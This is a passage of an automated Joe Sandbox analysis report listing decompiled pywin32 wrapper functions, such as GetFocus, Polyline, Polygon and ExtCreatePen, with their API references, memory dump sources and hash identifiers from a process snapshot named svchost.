                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(AbortPath,00000000), ref: 6DAB692D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$AbortArg_Error@@Object_ParsePathRestoreSaveTupleWin_
                            • String ID: AbortPath$O:AbortPath
                            • API String ID: 3893949505-1868330699
                            • Opcode ID: 473cd1aa82ab714a210d69275549bb9760735c8ae87749eeaceff191b2b16c07
                            • Instruction ID: 6981b9f5299eebd9b2c96717f9f9dfaf4e36e0cb16d2af4fcc08c4d57c733203
                            • Opcode Fuzzy Hash: 473cd1aa82ab714a210d69275549bb9760735c8ae87749eeaceff191b2b16c07
                            • Instruction Fuzzy Hash: 0A01A275908200AFCF006F64EC49B2A77B8FF41616F484534FC49C1221E735C92BDAE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB6C20, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 44threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:StrokeAndFillPath), ref: 6DAB6C37
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6C53
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6C62
                            • StrokeAndFillPath.GDI32(?), ref: 6DAB6C6E
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6C77
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(StrokeAndFillPath,00000000), ref: 6DAB6C8D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@FillObject_ParsePathRestoreSaveStrokeTupleWin_
                            • String ID: O:StrokeAndFillPath$StrokeAndFillPath
                            • API String ID: 3684901415-1572758478
                            • Opcode ID: e03f50425b6daabe0cfd36ceafb72add0239d4bd0d73d9c1ea0fbc5348b5cb5e
                            • Instruction ID: 8aff9bd2cf1b1d539bd17feec4fc0df45f869b9d6d047bd22c59c8fda309d54b
                            • Opcode Fuzzy Hash: e03f50425b6daabe0cfd36ceafb72add0239d4bd0d73d9c1ea0fbc5348b5cb5e
                            • Instruction Fuzzy Hash: CB01A2758082009FCF016F65ED4972A77B8FF41212F484534FC49C1221E335892BDAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0920, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 34threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 21%
                            			E6DAB0920(void* __eax, char* _a4, long _a8) {
				long _t5;
				void* _t7;
				long _t8;
				void* _t11;
				void* _t12;

				__imp__PyArg_ParseTuple(_a8, ":GetFocus");
				if(__eax != 0) {
					__imp__PyEval_SaveThread(_t7, _t11);
					_t12 = __eax;
					SetLastError(0);
					_t5 = GetFocus();
					_t8 = _t5;
					__imp__PyEval_RestoreThread(_t12);
					if(_t8 == 0) {
						_t5 = GetLastError();
						if(_t5 != 0) {
							_a8 = _t5;
							_a4 = "GetFocus";
							return __imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z();
						}
					}
					__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t8);
					return _t5;
				} else {
					return __eax;
				}
			}








                            0x6dab0929
                            0x6dab0934
                            0x6dab0939
                            0x6dab0941
                            0x6dab0943
                            0x6dab0949
                            0x6dab0950
                            0x6dab0952
                            0x6dab095d
                            0x6dab095f
                            0x6dab0967
                            0x6dab096b
                            0x6dab096f
                            0x6dab0977
                            0x6dab0977
                            0x6dab0967
                            0x6dab097e
                            0x6dab0989
                            0x6dab0936
                            0x6dab0936
                            0x6dab0936

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:GetFocus), ref: 6DAB0929
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0939
                            • SetLastError.KERNEL32(00000000), ref: 6DAB0943
                            • GetFocus.USER32 ref: 6DAB0949
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0952
                            • GetLastError.KERNEL32 ref: 6DAB095F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThread$Arg_FocusParseRestoreSaveTuple
                            • String ID: :GetFocus
                            • API String ID: 2260210701-1380985715
                            • Opcode ID: cfd56d78e0d2ae56ed8a0612b9f79463174e110b7932244890854ce50568e899
                            • Instruction ID: 675e792f17a8caef6130f8362f327df53cfcda916d2c351e0d4fab6fbc58272c
                            • Opcode Fuzzy Hash: cfd56d78e0d2ae56ed8a0612b9f79463174e110b7932244890854ce50568e899
                            • Instruction Fuzzy Hash: 86F0303650D3019FDF001B26A98C75A3B78FF86652F04C639E56AC1121E7348497DB97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAC020, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • memset.VCRUNTIME140(?,00000000,000001F4), ref: 6DAAC02E
                            • PyErr_SetString.PYTHON38(6E28ED8C,NONCLIENTMETRICS must be a dict), ref: 6DAAC058
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAAC069
                            Strings
                            • iiiiiO&iiO&iiO&O&O&:NONCLIENTMETRICS, xrefs: 6DAAC0E1
                            • NONCLIENTMETRICS must be a dict, xrefs: 6DAAC051
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_StringTuple_memset
                            • String ID: NONCLIENTMETRICS must be a dict$iiiiiO&iiO&iiO&O&O&:NONCLIENTMETRICS
                            • API String ID: 1212661818-1994947722
                            • Opcode ID: a76c4e17e8f78b710b5fb58f9777f8e85122ee58187de613cfed7a265550b094
                            • Instruction ID: 20841d42f51068a3e768eda6dd07791580d66f7d99296830d01d2ec4f3177d99
                            • Opcode Fuzzy Hash: a76c4e17e8f78b710b5fb58f9777f8e85122ee58187de613cfed7a265550b094
                            • Instruction Fuzzy Hash: F4213EB2104A45AFD711CB98CC84EF7B3FCEB45311F08462AF666C7111EB30A6998BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAABDB0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 78COMMON
                            Download Yara Rule
                            APIs
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?,?), ref: 6DAABE11
                            • Py_BuildValue.PYTHON38(NOk,00000000), ref: 6DAABE20
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?,?), ref: 6DAABE58
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,?,00000000), ref: 6DAABE62
                            • Py_BuildValue.PYTHON38(NNk,00000000), ref: 6DAABE6D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: FromObject_U_object@@$BuildValue
                            • String ID: NNk$NOk
                            • API String ID: 838942713-2856161187
                            • Opcode ID: c42e82431c8204ee78458451f01a978930fd75e34e6d994e53ba1324c9345d92
                            • Instruction ID: df88b6936e6397ea37ef2cc4f0a30b9b6c74c91253987de4eda5a41240fbce3b
                            • Opcode Fuzzy Hash: c42e82431c8204ee78458451f01a978930fd75e34e6d994e53ba1324c9345d92
                            • Instruction Fuzzy Hash: B12101369092059FDB289F29DC98EB37779FF45301B0A8398ED4857152DB31DCA2C7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAD1B0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68COMMON
                            Download Yara Rule
                            C-Code - Quality: 46%
                            			E6DAAD1B0(void* __ecx, intOrPtr _a8) {
				struct tagLOGBRUSH _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				char _v32;
				DWORD* _v36;
				void* _v56;
				long* _t23;
				void* _t25;
				DWORD** _t28;
				void* _t31;
				void* _t33;
				struct HPEN__* _t35;
				DWORD** _t39;
				DWORD** _t40;
				DWORD** _t41;

				_t33 = __ecx;
				_v32 = __imp___Py_NoneStruct;
				_v36 = 0;
				_t23 =  &_v16;
				__imp__PyArg_ParseTuple(_a8, "kkO|O:ExtCreatePen", _t23,  &_v20,  &_v28,  &_v32);
				_t39 =  &(( &_v36)[6]);
				if(_t23 != 0) {
					_t25 = E6DAAD0A0(_v28,  &_v12);
					_t40 =  &(_t39[2]);
					if(_t25 == 0) {
						goto L1;
					} else {
						_t28 =  &_v36;
						__imp__?PyWinObject_AsDWORDArray@@YAHPAU_object@@PAPAKPAKH@Z(_v32, _t28,  &_v24, 1);
						_t41 =  &(_t40[4]);
						if(_t28 == 0) {
							goto L1;
						} else {
							_t35 = ExtCreatePen(_v16, _v20,  &_v12, _v24, _v36);
							_t31 = _v56;
							if(_t31 != 0) {
								free(_t31);
								_t41 =  &(_t41[1]);
							}
							if(_t35 != 0) {
								return E6DAA5630(_t33, _t35);
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("ExtCreatePen", _t35);
								return _t31;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}




















                            0x6daad1b0
                            0x6daad1b8
                            0x6daad1c5
                            0x6daad1d3
                            0x6daad1e1
                            0x6daad1e7
                            0x6daad1ec
                            0x6daad1fd
                            0x6daad202
                            0x6daad207
                            0x00000000
                            0x6daad209
                            0x6daad210
                            0x6daad219
                            0x6daad21f
                            0x6daad224
                            0x00000000
                            0x6daad226
                            0x6daad242
                            0x6daad244
                            0x6daad24a
                            0x6daad24d
                            0x6daad253
                            0x6daad253
                            0x6daad258
                            0x6daad27b
                            0x6daad25a
                            0x6daad260
                            0x6daad26d
                            0x6daad26d
                            0x6daad258
                            0x6daad224
                            0x6daad1ee
                            0x6daad1ee
                            0x6daad1f3
                            0x6daad1f3

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,kkO|O:ExtCreatePen,?,?,?), ref: 6DAAD1E1
                            • ?PyWinObject_AsDWORDArray@@YAHPAU_object@@PAPAKPAKH@Z.PYWINTYPES38(?,?,?,00000001), ref: 6DAAD219
                            • ExtCreatePen.GDI32(?,?,?,?,?), ref: 6DAAD23C
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAD24D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ExtCreatePen,00000000), ref: 6DAAD260
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Array@@CreateError@@Object_ParseTupleWin_free
                            • String ID: ExtCreatePen$kkO|O:ExtCreatePen
                            • API String ID: 1050809504-2756505571
                            • Opcode ID: 2a06922b03688e6ab7dd35d8c5f09609be76354b3b54391a88c688ff6eab9ea0
                            • Instruction ID: d6b0ebf7fb5becf740c743451e19bcb0d5462a29e715e2d42dc8f081dc68ccae
                            • Opcode Fuzzy Hash: 2a06922b03688e6ab7dd35d8c5f09609be76354b3b54391a88c688ff6eab9ea0
                            • Instruction Fuzzy Hash: 36114CB540C305AFDB018F15CD44AAB7BE8BF84214F488A29FD89C2121F731DA99CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAA980, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E6DAAA980(intOrPtr _a8) {
				struct HDC__* _v4;
				int _v8;
				char _v12;
				char _v16;
				void* _v20;
				char* _t14;
				struct HDC__** _t15;
				void* _t19;
				int _t20;
				intOrPtr _t23;
				void* _t25;
				void** _t28;
				void** _t29;
				void** _t30;

				_v20 = 0;
				_t14 =  &_v16;
				_t23 = 0;
				__imp__PyArg_ParseTuple(_a8, "OO:Polyline", _t14,  &_v12);
				_t28 =  &(( &_v20)[4]);
				if(_t14 != 0) {
					_t15 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t15);
					_t29 =  &(_t28[2]);
					if(_t15 == 0) {
						goto L1;
					} else {
						_t19 = E6DAAA7E0( &_v20, _v12,  &_v20,  &_v8);
						_t30 =  &(_t29[3]);
						if(_t19 == 0) {
							goto L1;
						} else {
							_t25 = _v20;
							_t20 = Polyline(_v4, _t25, _v8);
							if(_t20 != 0) {
								 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
								_t23 = __imp___Py_NoneStruct;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("Polyline", _t20);
								_t30 =  &(_t30[2]);
							}
							if(_t25 != 0) {
								free(_t25);
							}
							return _t23;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

















                            0x6daaa988
                            0x6daaa991
                            0x6daaa995
                            0x6daaa9a1
                            0x6daaa9a7
                            0x6daaa9ac
                            0x6daaa9b5
                            0x6daaa9be
                            0x6daaa9c4
                            0x6daaa9c9
                            0x00000000
                            0x6daaa9cb
                            0x6daaa9d9
                            0x6daaa9de
                            0x6daaa9e3
                            0x00000000
                            0x6daaa9e5
                            0x6daaa9ea
                            0x6daaa9f3
                            0x6daaa9fb
                            0x6daaaa13
                            0x6daaaa15
                            0x6daaa9fd
                            0x6daaaa03
                            0x6daaaa09
                            0x6daaaa09
                            0x6daaaa1d
                            0x6daaaa20
                            0x6daaaa26
                            0x6daaaa30
                            0x6daaaa30
                            0x6daaa9e3
                            0x6daaa9ae
                            0x6daaa9ae
                            0x6daaa9b4
                            0x6daaa9b4

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:Polyline,?,?), ref: 6DAAA9A1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA9BE
                            • Polyline.GDI32(?,?,?), ref: 6DAAA9F3
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(Polyline,00000000), ref: 6DAAAA03
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAAA20
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePolylineTupleWin_free
                            • String ID: OO:Polyline$Polyline
                            • API String ID: 182940580-263511019
                            • Opcode ID: 880d920dc5d203c8b3e9f64730881e826ff6f4f728d48ae00fa444e873a54d12
                            • Instruction ID: bab87c3cec139355a16d254f96a44f36a1716f0bccbd6edd091d3e6ae99351ff
                            • Opcode Fuzzy Hash: 880d920dc5d203c8b3e9f64730881e826ff6f4f728d48ae00fa444e873a54d12
                            • Instruction Fuzzy Hash: 8B11B27650C201AFD7009F18DD44E6B7BF9FF85304F098629FC45D2121E331D91A86A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAA8C0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E6DAAA8C0(intOrPtr _a8) {
				struct HDC__* _v4;
				int _v8;
				char _v12;
				char _v16;
				void* _v20;
				char* _t14;
				struct HDC__** _t15;
				void* _t19;
				int _t20;
				intOrPtr _t23;
				void* _t25;
				void** _t28;
				void** _t29;
				void** _t30;

				_v20 = 0;
				_t14 =  &_v16;
				_t23 = 0;
				__imp__PyArg_ParseTuple(_a8, "OO:PolyGon", _t14,  &_v12);
				_t28 =  &(( &_v20)[4]);
				if(_t14 != 0) {
					_t15 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t15);
					_t29 =  &(_t28[2]);
					if(_t15 == 0) {
						goto L1;
					} else {
						_t19 = E6DAAA7E0( &_v20, _v12,  &_v20,  &_v8);
						_t30 =  &(_t29[3]);
						if(_t19 == 0) {
							goto L1;
						} else {
							_t25 = _v20;
							_t20 = Polygon(_v4, _t25, _v8);
							if(_t20 != 0) {
								 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
								_t23 = __imp___Py_NoneStruct;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("PolyGon", _t20);
								_t30 =  &(_t30[2]);
							}
							if(_t25 != 0) {
								free(_t25);
							}
							return _t23;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

















                            0x6daaa8c8
                            0x6daaa8d1
                            0x6daaa8d5
                            0x6daaa8e1
                            0x6daaa8e7
                            0x6daaa8ec
                            0x6daaa8f5
                            0x6daaa8fe
                            0x6daaa904
                            0x6daaa909
                            0x00000000
                            0x6daaa90b
                            0x6daaa919
                            0x6daaa91e
                            0x6daaa923
                            0x00000000
                            0x6daaa925
                            0x6daaa92a
                            0x6daaa933
                            0x6daaa93b
                            0x6daaa953
                            0x6daaa955
                            0x6daaa93d
                            0x6daaa943
                            0x6daaa949
                            0x6daaa949
                            0x6daaa95d
                            0x6daaa960
                            0x6daaa966
                            0x6daaa970
                            0x6daaa970
                            0x6daaa923
                            0x6daaa8ee
                            0x6daaa8ee
                            0x6daaa8f4
                            0x6daaa8f4

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:PolyGon,?,?), ref: 6DAAA8E1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA8FE
                            • Polygon.GDI32(?,?,?), ref: 6DAAA933
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(PolyGon,00000000), ref: 6DAAA943
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAA960
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePolygonTupleWin_free
                            • String ID: OO:PolyGon$PolyGon
                            • API String ID: 83150672-1472614813
                            • Opcode ID: eb5dd2dd40e58889ee53cc4d4772dbf47866a1faf108725175e61b87aa8abbb9
                            • Instruction ID: 2e6713f06a179ca6ae42b44e1b7003a309e2c368f49753a1b4568f66ab96b254
                            • Opcode Fuzzy Hash: eb5dd2dd40e58889ee53cc4d4772dbf47866a1faf108725175e61b87aa8abbb9
                            • Instruction Fuzzy Hash: 6F119D7A50C201EFD7009F19DD44AAB77FAFF89204F098629FC59D2121E331D95A8AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAD0A0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 58COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,LOGBRUSH must be a dict), ref: 6DAAD0BD
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAAD0CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_StringTuple_
                            • String ID: LOGBRUSH must be a dict$kkO
                            • API String ID: 3492737308-1200731744
                            • Opcode ID: a17e449c6730bb2b3b73f132a698dacadedc4fa27b77cdbcd21082f9089366b0
                            • Instruction ID: 34e1d710386a4acca988962635823d23ceb15c90dcc52b190557a98528ccf906
                            • Opcode Fuzzy Hash: a17e449c6730bb2b3b73f132a698dacadedc4fa27b77cdbcd21082f9089366b0
                            • Instruction Fuzzy Hash: D7118E7160C2029FDB009F18EC84F6B77B8AF81325F084325FC8587166E731D996C6A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAB530, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO|i:SetScrollInfo,?,?,?), ref: 6DAAB556
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB572
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAB59E
                            • SetScrollInfo.USER32(?,?,?,?), ref: 6DAAB5B7
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAB5C0
                            • PyLong_FromLong.PYTHON38(00000000), ref: 6DAAB5C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_FromInfoLongLong_Object_ParseRestoreSaveScrollTupleU_object@@
                            • String ID: OiO|i:SetScrollInfo
                            • API String ID: 863692505-3799893602
                            • Opcode ID: b32ec0235cf1d72fd7fd04512b795b7dd03e05339b2e9f958a605e678269fbca
                            • Instruction ID: 4e3e20b09985753fe0e10a451852a0d69633208416b86afc1a7daba87b9f5ec0
                            • Opcode Fuzzy Hash: b32ec0235cf1d72fd7fd04512b795b7dd03e05339b2e9f958a605e678269fbca
                            • Instruction Fuzzy Hash: AE115E76008206AFDB01DF14DC44AABBBFCBF85305F088A29F995C1130E735CA5A8B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91320, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
                            			E6DA91320(void* __eflags, intOrPtr _a4, int _a8, long _a12, int _a16) {
				long _v4;
				HANDLE* _v8;
				void* _t12;
				long _t13;
				void* _t15;
				long _t16;
				void* _t18;

				_t12 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
				if(_t12 != 0) {
					__imp__PyEval_SaveThread(_t18, _t15);
					_t13 = WaitForMultipleObjectsEx(_v4, _v8, _a8, _a12, _a16);
					_t16 = _t13;
					__imp__PyEval_RestoreThread(_t12);
					if(_t16 != 0xffffffff) {
						__imp__PyLong_FromLong(_t16);
					} else {
						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WaitForMultipleObjectsEx", 0);
					}
					free(_v8);
					return _t13;
				} else {
					return _t12;
				}
			}










                            0x6da91331
                            0x6da9133b
                            0x6da91343
                            0x6da9135f
                            0x6da91366
                            0x6da91368
                            0x6da91374
                            0x6da91389
                            0x6da91376
                            0x6da9137d
                            0x6da91383
                            0x6da91398
                            0x6da913a8
                            0x6da91340
                            0x6da91340
                            0x6da91340

                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA91343
                            • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?), ref: 6DA9135F
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA91368
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WaitForMultipleObjectsEx,00000000), ref: 6DA9137D
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA91398
                            Strings
                            • WaitForMultipleObjectsEx, xrefs: 6DA91378
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: WaitForMultipleObjectsEx
                            • API String ID: 3294986040-1369009817
                            • Opcode ID: 4cef1ed50dcc708ec85ef225560414aa7ab92aa11bff50f8384818dca73e26ae
                            • Instruction ID: adc4d59fdc8b62fd2c948e2e72a5888c3288452c0a5494a76ea24c83e7c1a825
                            • Opcode Fuzzy Hash: 4cef1ed50dcc708ec85ef225560414aa7ab92aa11bff50f8384818dca73e26ae
                            • Instruction Fuzzy Hash: E901F27581C300ABCF001BA4EC45A6B7AF8FF4D21AF048634F95599150E73AC9299BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91200, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 28%
